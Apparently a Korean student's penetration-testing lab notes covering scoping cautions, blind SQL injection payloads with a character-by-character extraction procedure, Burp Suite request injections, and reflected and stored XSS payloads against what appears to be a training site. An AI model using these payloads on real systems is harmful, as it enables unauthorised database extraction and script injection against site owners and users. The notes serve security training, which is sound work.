1. 모의해킹 업무 - 보안성 심의, ISMS-P, SR
보안성 심의 - 웹사이트 서비스 전 심의
SR - 새로운 서비스에 대한 페이지, 메뉴에 대한 심의
ISMS-P - 인증을 위한 기술적 심



모의해킹 주의사항:
naver.com에 대한 모의해킹을 진행한다 했을 때, webtoon.naver.com과 같은 상위 도메인에 대한 해킹을 하지 않도록 주의
회원가입 주소찾기의 경우 url이 우체국.com 인 경우도 있는데, 이 경우 union 공격을 하면 안됨 신고당함1. 모의해킹 업무 - 보안성 심의, ISMS-P, SR
보안성 심의 - 웹사이트 서비스 전 심의
SR - 새로운 서비스에 대한 페이지, 메뉴에 대한 심의
ISMS-P - 인증을 위한 기술적 심



모의해킹 주의사항:
naver.com에 대한 모의해킹을 진행한다 했을 때, webtoon.naver.com과 같은 상위 도메인에 대한 해킹을 하지 않도록 주의
회원가입 주소찾기의 경우 url이 우체국.com 인 경우도 있는데, 이 경우 union 공격을 하면 안됨 신고당함

pentestmonkeyt > db sql injection 치트 시트

sql
프론트엔드(html, css) 백엔드(php, asp)
python, javascript, java, C,  


blind sql = 관리자' and (select count(table_name) from information_schema.tables) < 86 #

sas' or 1=1 #


##blind sql 과정
sas'-- 
sas'#

%
'
=
and
()
>
user()
length
사용 가능한지 확인

sas%' (                         ) and '%1%'='%1

sas%' () and '%1%'='%1

-------------------------------------------

sas%' and (1)=(1) and '%1%'='%1

sas%' and 'a'='a' and '%1%'='%1

sas%' and 1<2 and '%1%'='%1

sas%' and user()=user() and '%1%'='%1

sas%' and length(user()=user())>0  and '%1%'='%1

-------------------------------------------


sas%' and length(user())=15  and '%1%'='%1

sas%' and substring(user(),1,1)>char(104)  and '%1%'='%1
or
sas%' and ascii(substring(user(),1,1))>104  and '%1%'='%1 -> i

##blind sql 과정 finish


##burpsuite를 통한 패킷 인젝션
GET /exam7/notice.php?pageIndex=1&board_id=&sorting=title&sotingAd=DESC,case+when+1=1+then+1+else+(select+1+union+select+2)+end&startDt=&endDt=&searchType=all&keyword= HTTP/1.1
GET /exam12/notice.php?pageIndex=1&board_id=&sorting=&sotingAd=DESC&startDt=20231001&endDt=20231031+and+user()user()+and+1=1 &searchType=all&keyword= HTTP/1.1


sql을 예방하기 위한 방법인 prepared statement 중 parse bind execute fetch 단계에서 bind 부분이 가장 중요함 < 더 공부하기


##xss
크사 공격시 //가 필터링 되어 있다면 https:www.naver.com 혹은 https:\\www.naver.com 등으로 우회할 수 있음

reflected 크사 공격 예시 : GET /exam16/notice.php?pageIndex=1"><script>alert("xss")</script>&board_id=&sorting=&sotingAd=DESC&startDt=&endDt=&searchType=all&keyword=xss HTTP/1.1
reflected크사 공격 예시 : GET /exam17/noticeview.php?pageIndex=1&board_id=';}{alert("xss");'&sorting=&sotingAd=DESC&startDt=&endDt=&searchType=all&keyword= HTTP/1.1

stored 크사 공격 예시 게시판:
POST /exam20/process/faqProcess.php HTTP/1.1
Host: quiz.sas.ne.kr
Content-Length: 649
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: ko-KR,ko;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvNc3w5VLMU4OrJW7
Origin: http://quiz.sas.ne.kr
Referer: http://quiz.sas.ne.kr/exam20/faqwrite.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=saq70jpkrdufu9868hpjmuokn5
Connection: keep-alive

------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="boardId"


------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="regType"


------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="fileupload"


------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="aFiles"


------WebKitFormBoundaryvNc3w5VLMU4OrJW7
Content-Disposition: form-data; name="content"

<p></p><script>alert("xss");</script>
------WebKitFormBoundaryvNc3w5VLMU4OrJW7--

